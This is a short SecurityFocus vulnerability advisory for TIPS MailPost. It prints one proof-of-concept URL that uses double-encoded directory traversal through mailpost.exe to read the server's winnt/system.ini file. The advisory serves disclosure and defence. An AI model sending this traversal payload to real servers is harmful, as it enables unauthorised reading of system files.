Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

TIPS MailPost Remote File Enumeration Vulnerability

No exploit is required to leverage this issue. The following proof of concet has been provided:

http://www.example.com/scripts/mailpost.exe/..%255c..%255c..%255cwinnt/system.ini?*nosend*=&email=test@procheckup.com







 

Privacy Statement
Copyright 2009, SecurityFocus